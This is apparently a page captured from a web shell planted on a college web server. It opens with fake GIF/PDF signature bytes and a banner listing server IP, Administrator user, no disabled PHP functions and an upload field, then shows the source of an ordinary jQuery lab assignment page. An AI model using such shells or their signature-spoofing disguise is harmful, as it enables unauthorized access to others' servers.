GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/CST1022/Labs/Lab10/ |
Upload File : |
<? // JimMartinson/CST1021/Labs/Lab11/Lab11.phpinc $css .= ',colorCode.css'; require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. #if ( $_SESSION['userId'] != 1 ) { require('Gradebook/EvaluationSubmission_NOTAVAILABLE.phpinc'); exit; } require('common/Browser/Browser.phpinc'); $disabled = ''; $disabled = ' disabled'; ?> <fieldset><legend>Description</legend> The purpose of this lab is to demonstrate your ability to use jQuery. <?=$gradeNote?> <? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <fieldset><legend><?=$evaluationType?> Instruction</legend> <ol id="main" class="count"> <!-- Step 1 --> <li>Create a folder for this <?=strtolower($evaluationType)?> named <b class="copyText"><?=$evaluationName?></b> and keep all documents used for <?=$evaluationType?> <?=$evaluationNumber?> in that folder.</li> <!-- Step 2 --> <li>Go to the <a href="https://www.udacity.com/">Udacity website</a> and create a free account. (<span class="copyText">https://www.udacity.com/</span>)</li> <li>Take the free <a href="https://classroom.udacity.com/courses/ud245">Intro to jQuery</a> class (<span class="copyText">https://classroom.udacity.com/courses/ud245</span>). <br>You can stop and then restart the lessons as needed. <br>There are three lessons (though it feels like one): <ul> <li><i>The Basics: the DOM, $, and Selectors</i></li> <li><i>The Tricks: DOM Manipulation</i></li> <li><i>Event Listeners with jQuery</i></li> </ul> </li> <li>When you are done: <ol> <li>Reload the <a href="https://classroom.udacity.com/courses/ud245">Intro to jQuery</a> page from Udacity.</li> <li>Shrink the cards (SHRINK CARD) so only the lesson names and <img src="images/completed.png" width="140" height="32" alt="completed"> are shown.</li> <li><b class="info">Take a screenshot</b> and save it in the <b><?=$evaluationName?></b> directory as <b class="copyText" style="white-space:nowrap;"><?=$saveFilename?>.png</b>. <br><div id="show_page_a" class="inline"><a href="#" onClick="divHide('show_page_a'); divShow('hide_page_a'); return false;">See an example:</a></div> <div id="hide_page_a" class="hidden"><a href="#" onClick="divHide('hide_page_a'); divShowInline('show_page_a'); return false;">Hide the example.</a> <? BrowserBegin('Intro to jQuery - Udacity','https://classroom.udacity.com/courses/ud245'); ?> <img src="images/example.png" width="900" height="554" alt="example Intro to jQuery completed"> <? BrowserEnd(); ?> </div> </li> </ol> </li> <li>Turn in your assignment: <ol type="a"> <li>Ensure the following file is in your <b><?=$evaluationName?></b> folder:<? $uploadFilename = "$saveFilename.png"; $fileList = array( $uploadFilename, ); natcasesort($fileList); foreach ($fileList as $fileName) { ?> <br><?=$fileName?> <? } ?> </li> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li> </ol> </li> </ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <script src="/js/colorCode.js"></script> <? $PartialGradingCriteria = ' <table> <tr><th>Lesson</th><th>Points</th></tr> <tr><td><i>The Basics: the DOM, $, and Selectors</i> lesson shows completed</td><td class="right">5</td></tr> <tr><td><i>The Tricks: DOM Manipulation</i> lesson shows completed</td><td class="right">5</td></tr> <tr><td>The <i>Event Listeners with jQuery</i> lesson shows completed</td><td class="right">5</td></tr> <tr><th class="right">Total:</th><th class="right">assignmentPoints</th></tr> </table> '; //require('../LabNotes.phpinc'); require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. #require('../../ReferencesResources.phpinc'); #require($Instructor['Path'].'/ContactInformation.phpinc'); if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>